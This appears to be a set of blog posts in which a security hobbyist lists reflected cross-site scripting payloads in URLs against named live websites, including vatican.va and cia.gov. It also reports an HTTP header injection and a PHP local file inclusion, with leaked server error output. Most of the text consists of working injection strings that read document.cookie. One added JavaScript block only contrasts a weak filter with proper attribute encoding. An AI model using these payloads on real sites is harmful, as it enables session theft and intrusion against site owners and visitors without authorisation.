Posts

vatican.va | XSS - SQL injection - system compromise

Yes, it could be done. More information soon on this blog. (Remember ... no defacements, no data retrieval, no bad things.)
Meanwhile I've found this simple XSS (put an XSS in any text box):
http://asv.vatican.va/cercait/index.php?advanced=1
"><video src=1 onerror=alert(document.cookie)>
Anyway, I'm playing on something else that is more interesting.

http://www.gossipnews.it | xss

XSS in almost all the pages
-------------------------- OLD -----------------------
http://www.gossipnews.it/cinema/vedifoto.php?id=3cbd57ad5223375ca2a5089283966818&num=19%3Cscript%3Ealert(document.cookie);%3C/script%3E&
http://www.gossipnews.it/musica/gli_zero_assoluto_fotorw.html?id=5ccabcbfb5861ba35a6b271c76a5ade0&num=5%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C%22
any location - HTTP header injection
http://www.gossipnews.it/open/www/delivery/ck.php?oaparams=2__bannerid=537__zoneid=50__cb=1812239d6e__oadest=http%3A%2F%2Fwww.google.com
-------------------------- NEW -----------------------
http://www.gossip.it/news/monografia.php?keyword=ssasdadas"><script>alert(1);</script>

teletu.it | XSS

http://supporto.teletu.it/cerca/?query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&search=1
Any XSS in the forms:
http://www.teletu.it/teletu/nuova-linea.php
http://www.teletu.it/tuttocompreso/offerte/tutto-per-te.php

cia.gov | XSS

The < and > characters are not allowed, but " and = can be injected, so we can add to the <input> tag a style that enlarges the area and an onmouseover, so that JavaScript is fired when the mouse passes over the (enlarged) text input. We can also do other things, but this should be enough.
https://www.cia.gov/search?q=%22%20style%3d%22height:900px;%22%20onMouseOver%3d%22alert(document.cookie)
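
The filter described above, as an added example that is not part of the original post and not the site's code: it renders the query from the URL into a double-quoted attribute with an angle-bracket-only filter and then with attribute encoding, and lists the attributes the tag ends up with. The input template and all function names are assumptions.

```javascript
// Added example: the template and function names are assumptions,
// not the markup or code of the site discussed in the post.

// Weak filter as described above: only angle brackets are removed.
function stripAngleBrackets(s) {
  return s.replace(/[<>]/g, "");
}

// Encoding suited to a double-quoted HTML attribute value.
function escapeAttr(s) {
  return s.replace(/[&<>"']/g, (c) => "&#" + c.charCodeAt(0) + ";");
}

// Hypothetical search-box template that echoes the query back.
function renderInput(q, encode) {
  return `<input type="text" name="q" value="${encode(q)}">`;
}

// Minimal attribute lister for this one tag (not a general HTML parser).
function attrNames(tag) {
  const names = [];
  const re = /([a-zA-Z-]+)\s*=\s*"[^"]*"/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Value of the q parameter from the URL in the post, percent-decoded.
function sampleQuery() {
  return decodeURIComponent(
    "%22%20style%3d%22height:900px;%22%20onMouseOver%3d%22alert(document.cookie)"
  );
}

const q = sampleQuery();
// Angle-bracket filter: the quote closes value="" and two attributes appear.
console.log("angle-bracket filter:", attrNames(renderInput(q, stripAngleBrackets)));
// Attribute encoding: the whole query stays inside value="...".
console.log("attribute encoding:  ", attrNames(renderInput(q, escapeAttr)));
```

The same encoding has to be applied wherever the query is echoed into an attribute; a filter chosen for element content does not cover the attribute context.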

www.adnkronos.com | XSS - Local file inclusion (php)

XSS: modifies the script within the setTimeout (works after 300000 ms)
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie+'
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie);",1);setTimeout("alert('
Local File Inclusion: the same problem appears in several parts of the website, even if blind (no error in the output).
http://www.adnkronos.com/IGN/Zoom/?id=
Sample error (added a ' ):
Warning: include(news/3.0.4217592951\'.inc.php) [function.include]: failed to open stream: No such file or directory in /opt/apache2/www60/IGN/Zoom/index.php on line 11
Warning: include() [function.include]: Failed opening 'news/3.0.4217592951\'.inc.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /opt/apache2/www60/IGN/Zoom/index.php on line 11
The error doesn't always appear. Probably the response is from different servers and only one of those is showing the...

www.opensourcecms.com www.tradepub.com | several XSS

Several XSS all over the website (more than those listed).
Samples (XSS after the id or the page will redirect):
http://php.opensourcecms.com/scripts/details.php?scriptid=339%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cval=&name=Mac's%20CMS
http://php.opensourcecms.com/scripts/show.php?catid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&cat=CMS%20/%20Portals
http://php.opensourcecms.com/news/index.php?page=2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&sortby=dateasc
http://php.opensourcecms.com/scripts/details.php?scriptid=19%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&name=e107
Sample on tradepub.com, closing the comment in the HTML:
http://php-opensourcecms.tradepub.com/?pt=cat&page=Cons--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--
There are several others.